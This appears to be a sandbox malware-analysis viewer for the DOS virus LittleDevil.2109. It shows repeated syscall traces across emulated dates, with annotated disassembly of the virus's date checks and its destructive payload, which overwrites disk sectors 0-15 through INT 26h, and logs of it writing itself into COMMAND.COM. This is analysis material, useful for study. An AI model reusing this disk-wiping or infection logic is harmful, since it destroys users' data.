Sample viewer

vx.netlux.org/Virus.DOS.LittleDevil.2109


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:25.645855141Z 22 PC: 12de1 | Create or truncate file
2018-12-17T22:42:25.647744282Z 11 PC: 12de5 | Get input status
2018-12-17T22:42:25.651017433Z 250 PC: 12ded | UNKNOWN!
2018-12-17T22:42:25.652022154Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-17T22:42:25.653932732Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-17T22:42:25.657375327Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-17T22:42:25.660282565Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-17T22:42:25.663240361Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-17T22:42:25.667481774Z 74 PC: 130dd | Reallocate memory
2018-12-17T22:42:25.669595203Z 74 PC: 12e31 | Reallocate memory
2018-12-17T22:42:25.670851896Z 72 PC: 12e3a | Allocate memory
2018-12-17T22:42:25.673501177Z 67 PC: 130e4 | Get or set file attributes
2018-12-17T22:42:25.679030718Z 61 PC: 130e4 | Open file (Filename = 'C:\COMMAND.COM')
2018-12-17T22:42:25.685226938Z 87 PC: 130e4 | Get or set file date and time
2018-12-17T22:42:25.687332142Z 63 PC: 130e4 | Read file or device (Read 24 bytes on handle 5)
2018-12-17T22:42:25.690097872Z 66 PC: 130e4 | Move file pointer
2018-12-17T22:42:25.69146839Z 64 PC: 130e4 | Write file or device (Write 11 bytes on handle 5)
2018-12-17T22:42:25.695486218Z 64 PC: 130e4 | Write file or device (Write 2109 bytes on handle 5)
2018-12-17T22:42:26.221635804Z 66 PC: 130e4 | Move file pointer
2018-12-17T22:42:26.223600953Z 64 PC: 130e4 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:42:26.227574652Z 87 PC: 130e4 | Get or set file date and time
2018-12-17T22:42:26.229452062Z 62 PC: 130e4 | Close file
2018-12-17T22:42:26.236796705Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:42:26.24240607Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.09751664Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.099415041Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.102125801Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.102927025Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.104499277Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.109470847Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.111694528Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.114291189Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.117811199Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.1197477Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.121304628Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.123677603Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.129525029Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.137105467Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.13989934Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.143068276Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.144855399Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.149579298Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.142995699Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.144639677Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.147851257Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.150131987Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.293042614Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.299277734Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.094264688Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.096802688Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.100448056Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.101500375Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.103358778Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.105800455Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.108291019Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.110676383Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.113978391Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.115951542Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.117373326Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.119764364Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.125858461Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.133361071Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.135416245Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.138518092Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.140286292Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.144687269Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.142762168Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.144272255Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.14775906Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.149322279Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.292827066Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.300547444Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":24,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.159438504Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.162501556Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.165538463Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.166624535Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
; In this run both comparisons matched: the next logged row is Get default drive at PC 12fcf, and the JSON record printed just above the run sets Day 24, Month 12.
; The table has no row for int 0x26, so the sector write is not recorded in this trace; the last row is Display string at the self-jump address 12fe1.
; NOTE(review): that row reports "Could not find end pointer", presumably because no '$' terminator was found from DS:0xe - confirm against the sandbox's semantics.
2018-12-25T12:01:49.168162053Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
2018-12-25T12:01:49.171125231Z 25 PC: 12fcf | Get default drive
2018-12-25T12:01:51.142665178Z 9 PC: 12fe1 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.284425404Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.286528705Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.289559446Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.290453834Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.292484898Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fc4: jne 0x12fe6 ; no match: go to the next date check
0x12fc6: cmp dl, 0x18 ; DL = day of month; 0x18 = 24
0x12fc9: jne 0x12fe6
0x12fcb: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x12fcd: int 0x21
0x12fcf: mov dx, 0 ; DX = first logical sector (0)
0x12fd2: mov cx, 0x10 ; CX = sector count (16)
0x12fd5: mov bx, 0 ; DS:BX = source buffer, offset 0
0x12fd8: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x12fda: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x12fdc: mov dx, 0xe
0x12fdf: int 0x21
0x12fe1: jmp 0x12fe1 ; branches to itself, so execution stays at this address
0x12fe3: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x12fe6: mov ah, 0x2a ; AH=2Ah Get date, repeated before the next comparison
0x12fe8: int 0x21
0x12fea: cmp dh, 0xc
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; 0x19 = 25; the disassembly window ends here
; Date triggers 2 and 3 of 4: 25 December (reuses the payload at 0x12fcb) and 1 January 2000.
2018-12-25T12:01:49.294835129Z 42 PC: 12fea | Get date 0x12fea: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
0x12fed: jne 0x12ff6
0x12fef: cmp dl, 0x19 ; DL = day of month; 0x19 = 25
0x12ff2: jne 0x12ff6
0x12ff4: jmp 0x12fcb ; match: run the same payload as the 24 December check
0x12ff6: mov ah, 0x2a ; AH=2Ah Get date again
0x12ff8: int 0x21
0x12ffa: cmp dh, 1 ; month = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; day = 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025
0x1300a: mov ah, 0x19 ; second payload copy: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; the disassembly window ends here
; Date trigger 3 of 4: 1 January 2000, with its own payload copy and message offset 0x10e.
2018-12-25T12:01:49.297130979Z 42 PC: 12ffa | Get date 0x12ffa: cmp dh, 1 ; DH = month from INT 21h/AH=2Ah; 1 = January
0x12ffd: jne 0x13025
0x12fff: cmp dl, 1 ; DL = day of month; 1
0x13002: jne 0x13025
0x13004: cmp cx, 0x7d0 ; CX = year; 0x7d0 = 2000
0x13008: jne 0x13025 ; any mismatch: go to the last date check
0x1300a: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x1300c: int 0x21
0x1300e: mov dx, 0 ; DX = first logical sector (0)
0x13011: mov cx, 0x10 ; CX = sector count (16)
0x13014: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13017: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13019: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x1301b: mov dx, 0x10e
0x1301e: int 0x21
0x13020: jmp 0x13020 ; branches to itself, so execution stays at this address
0x13022: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x13025: mov ah, 0x2a ; AH=2Ah Get date for the last check
0x13027: int 0x21
0x13029: cmp dh, 0xb ; 0xb = November; the disassembly window ends here
; Date trigger 4 of 4: 6 November. When it does not match, execution continues at 0x1304e.
2018-12-25T12:01:49.299828839Z 42 PC: 13029 | Get date 0x13029: cmp dh, 0xb ; DH = month from INT 21h/AH=2Ah; 0xb = November
0x1302c: jne 0x1304e
0x1302e: cmp dl, 6 ; DL = day of month; 6
0x13031: jne 0x1304e
0x13033: mov ah, 0x19 ; payload: AH=19h returns the default drive in AL
0x13035: int 0x21
0x13037: mov dx, 0 ; DX = first logical sector (0)
0x1303a: mov cx, 0x10 ; CX = sector count (16)
0x1303d: mov bx, 0 ; DS:BX = source buffer, offset 0
0x13040: int 0x26 ; DOS absolute disk write: overwrites logical sectors 0-15 of drive AL
0x13042: mov ah, 9 ; AH=09h prints the '$'-terminated string at DS:DX
0x13044: mov dx, 0x1a7
0x13047: int 0x21
0x13049: jmp 0x13049 ; branches to itself, so execution stays at this address
0x1304b: jmp 0x133c5 ; follows the self-jump; not reached by fall-through
0x1304e: mov ax, 0xffff ; no trigger matched: DS is set to 0xffff
0x13051: mov ds, ax
0x13053: push cs ; ES = CS
0x13054: pop es
0x13055: xor si, si ; SI = 0; what this setup is used for lies outside the window
2018-12-25T12:01:49.302731766Z 74 PC: 130dd | Reallocate memory
2018-12-25T12:01:49.304550723Z 74 PC: 12e31 | Reallocate memory
2018-12-25T12:01:49.306092589Z 72 PC: 12e3a | Allocate memory
2018-12-25T12:01:49.3084792Z 67 PC: 130e4 | Get or set file attributes
2018-12-25T12:01:49.31481176Z 61 PC: 130e4 | Open file (See above)
2018-12-25T12:01:49.321989375Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:49.331237481Z 63 PC: 130e4 | Read file or device (See above)
2018-12-25T12:01:49.33409264Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:49.335552614Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:49.339753487Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.142731538Z 66 PC: 130e4 | Move file pointer (See above)
2018-12-25T12:01:51.14475666Z 64 PC: 130e4 | Write file or device (See above)
2018-12-25T12:01:51.149453146Z 87 PC: 130e4 | Get or set file date and time (See above)
2018-12-25T12:01:51.152021808Z 62 PC: 130e4 | Close file (See above)
2018-12-25T12:01:51.303602487Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:51.310276889Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7542,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:49.436675385Z 22 PC: 12de1 | Create or truncate file
2018-12-25T12:01:49.438412563Z 11 PC: 12de5 | Get input status
2018-12-25T12:01:49.440175706Z 250 PC: 12ded | UNKNOWN!
2018-12-25T12:01:49.440976716Z 75 PC: 12fad | Execute program
; Date trigger 1 of 4: 24 December. The payload body at 0x12fcb is also the target of the 25 December check.
2018-12-25T12:01:49.442777739Z 42 PC: 12fc1 | Get date 0x12fc1: cmp dh, 0xc ; DH = month from INT 21h/AH=2Ah; 0xc = December
